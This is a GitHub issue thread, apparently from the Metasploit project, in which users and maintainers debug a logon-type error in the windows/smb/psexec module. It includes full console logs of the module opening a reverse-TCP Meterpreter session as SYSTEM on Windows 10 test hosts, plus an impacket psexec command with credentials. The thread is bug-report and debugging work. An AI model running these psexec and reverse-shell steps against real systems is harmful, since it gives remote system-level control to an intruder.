Open friedrico opened 3 years ago
Hi!
This issue has been left open with no activity for a while now.
We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here. If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!
As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.
It looks like there's not enough information to replicate this issue. Please provide any relevant output and logs which may be useful in diagnosing the issue.
This includes:
debug
command in your Metasploit consoleThe easier it is for us to replicate and debug an issue means there's a higher chance of this issue being resolved.
cc @cdelafuente-r7 - I'm not sure if there's enough detail to replicate the original issue, but does anything pop out to you as being different maybe? 🤔
I just tested against Windows 10 version 20H2 and could not reproduce the issue:
msf6 exploit(windows/smb/psexec) > options
Module options (exploit/windows/smb/psexec):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS <redacted_ip> yes The target host(s), range CIDR identifier, or hosts file with sy
ntax 'file:<path>'
RPORT 445 yes The SMB service port (TCP)
SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SHARE no The share to connect to, can be an admin share (ADMIN$,C$,...) o
r a normal read/write folder share
SMBDomain . no The Windows domain to use for authentication
SMBPass <redacted> no The password for the specified username
SMBUser smbtest no The username to authenticate as
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST <redacted_ip> yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf6 exploit(windows/smb/psexec) > set verbose true
verbose => true
msf6 exploit(windows/smb/psexec) > run
[*] Started reverse TCP handler on <redacted_ip>:4444
[*] <redacted_ip>:445 - Connecting to the server...
[*] <redacted_ip>:445 - Authenticating to <redacted_ip>:445 as user 'smbtest'...
[!] <redacted_ip>:445 - No active DB -- Credential data will not be saved!
[*] <redacted_ip>:445 - Checking for System32\WindowsPowerShell\v1.0\powershell.exe
[*] <redacted_ip>:445 - PowerShell found
[*] <redacted_ip>:445 - Selecting PowerShell target
[*] <redacted_ip>:445 - Powershell command length: 2463
[*] <redacted_ip>:445 - Executing the payload...
[*] <redacted_ip>:445 - Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:<redacted_ip>[\svcctl] ...
[*] <redacted_ip>:445 - Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:<redacted_ip>[\svcctl] ...
[*] <redacted_ip>:445 - Obtaining a service manager handle...
[*] <redacted_ip>:445 - Creating the service...
[+] <redacted_ip>:445 - Successfully created the service
[*] <redacted_ip>:445 - Starting the service...
[+] <redacted_ip>:445 - Service start timed out, OK if running a command or non-service executable...
[*] <redacted_ip>:445 - Removing the service...
[+] <redacted_ip>:445 - Successfully removed the service
[*] <redacted_ip>:445 - Closing service handle...
[*] Sending stage (175174 bytes) to <redacted_ip>
[*] Meterpreter session 1 opened (<redacted_ip>:4444 -> <redacted_ip>:50158) at 2021-06-08 18:36:12 +0200
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : DESKTOP-UUQE0B4
OS : Windows 10 (10.0 Build 19042).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
@friedrico, that would be great if we could have more details to help us reproduce the issue. Also, a PCAP would be useful. Since SMBv3 with encryption is used by default, please disable encryption with this option to get meaningful packet capture:
set SMB::AlwaysEncrypt false
Hi!
This issue has been left open with no activity for a while now.
We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here. If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!
As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.
Hi again!
It’s been 60 days since anything happened on this issue, so we are going to close it. Please keep in mind that I’m only a robot, so if I’ve closed this issue in error please feel free to reopen this issue or create a new one if you need anything else.
As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.
Sorry, havent had time.
I just repeated the actions - still the same problem. Even if I used set SMB::AlwaysEncrypt false
The following global/module datastore, and database setup was configured before the issue occurred:
The following commands were ran during the session and before this issue occurred:
The following framework errors occurred before the issue occurred:
The following web service errors occurred before the issue occurred:
The following framework logs were recorded before the issue occurred:
The following web service logs were recorded before the issue occurred:
The versions and install method of your Metasploit setup:
sanitized
base64 -d <<< BASE64STR > my.pcap
Can I unclose the issue?
@friedrico Thanks for the update :+1: Just as an additional datapoint - what was the target OS, i.e. output of systeminfo
?
@friedrico Thanks for the update +1 Just as an additional datapoint - what was the target OS, i.e. output of
systeminfo
?
meterpreter > sysinfo
Computer : WIN7
OS : Windows 10 (10.0 Build 16299).
Architecture : x64
System Language : en_US
Domain : ...
Logged On Users : 6
Meterpreter : x86/windows
Hi!
This issue has been left open with no activity for a while now.
We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here. If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!
As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.
Hi!
This issue has been left open with no activity for a while now.
We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here. If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!
As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.
Hi!
This issue has been left open with no activity for a while now.
We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here. If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!
As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.
Hi again!
It’s been 60 days since anything happened on this issue, so we are going to close it. Please keep in mind that I’m only a robot, so if I’ve closed this issue in error please feel free to reopen this issue or create a new one if you need anything else.
As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.
Beep boop, I think the inactivity bot closed this one erroneously. Can we re-open?
This is still affecting recent systems -- here's a Windows 10 target example with the output of systeminfo
:
meterpreter > execute -if "systeminfo"
Process 6836 created.
Channel 4 created.
Host Name: irrelevant
OS Name: Microsoft Windows 10 Enterprise
OS Version: 10.0.19044 N/A Build 19044
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00329-10181-97955-AA169
Original Install Date: 5/3/2022, 11:35:25 PM
System Boot Time: 11/11/2022, 6:44:39 PM
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 2 Processor(s) Installed.
[01]: Intel64 Family 6 Model 142 Stepping 9 GenuineIntel ~3504 Mhz
[02]: Intel64 Family 6 Model 142 Stepping 9 GenuineIntel ~3504 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 11/12/2020
Windows Directory: C:\WINDOWS
System Directory: C:\WINDOWS\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC) Coordinated Universal Time
Total Physical Memory: 4,095 MB
Available Physical Memory: 2,468 MB
Virtual Memory: Max Size: 4,799 MB
Virtual Memory: Available: 3,350 MB
Virtual Memory: In Use: 1,449 MB
Metasploit version:
msfconsole -qx 'version'
Framework: 6.0.27-dev-
Console : 6.0.27-dev-
Tagging @adfoster-r7 (like a jerk) since I'm not sure how notifications work on closed issues.
@jeffmcjunkin Thanks for the ping; I grabbed friedrico's pcap and it seems like it might be an issue when using psexec with a local admin. Google's hinting that it might be a difference between using psexec and psexec -i for interactive logons versus network logon - but I haven't found the right gpo/priv incantations to replicate the error
If there's more details for how to create an env to reproduce this error that would be appreciated 💯
Edit: I added a user to the Deny access to this computer from the network
gpo and got the STATUS_LOGON_TYPE_NOT_GRANTED
error:
msf6 exploit(windows/smb/psexec) > run smb://admin_without_remote:p4$$w0rd@192.168.123.13
[*] Started reverse TCP handler on 192.168.123.1:4444
[*] 192.168.123.13:445 - Connecting to the server...
[*] 192.168.123.13:445 - Authenticating to 192.168.123.13:445|testing as user 'admin_without_remote'...
[-] 192.168.123.13:445 - Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: (0xc000015b) STATUS_LOGON_TYPE_NOT_GRANTED: A user has requested a type of logon (for example, interactive or network) that has not been granted. An administrator has control over who may logon interactively and through the network.
[*] Exploit completed, but no session was created.
but impacket didn't work either, so I'm probably close to the right area - but still haven't fully replicated yet 🤔
python3 ~/Documents/code/impacket/examples/psexec.py 'admin_without_remote:p4$$w0rd@192.168.123.13'
Impacket v0.10.1.dev1+20220720.103933.3c6713e3 - Copyright 2022 SecureAuth Corporation
[-] SMB SessionError: STATUS_LOGON_TYPE_NOT_GRANTED(A user has requested a type of logon (for example, interactive or network) that has not been granted. An administrator has control over who may logon interactively and through the network.)
Tagging @joswr1ght who has encountered this issue as well, and I think can replicate it at will.
Hi!
This issue has been left open with no activity for a while now.
We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here. If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!
As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.
Beep boop, this issue isn't Stale
. @joswr1ght, can you still replicate this?
The steps for enabling the flags/policies to get an account to trigger this error locally where Metasploit fails and other tools succeed would definitely be appreciated 💯
I'm still thinking it's something to do with network logins versus interactive logins, but I haven't looked at this since poking at it last
Why does exploit/windows/smb/psexec react different from impacket-psexec? Shouldnt they do the same thing?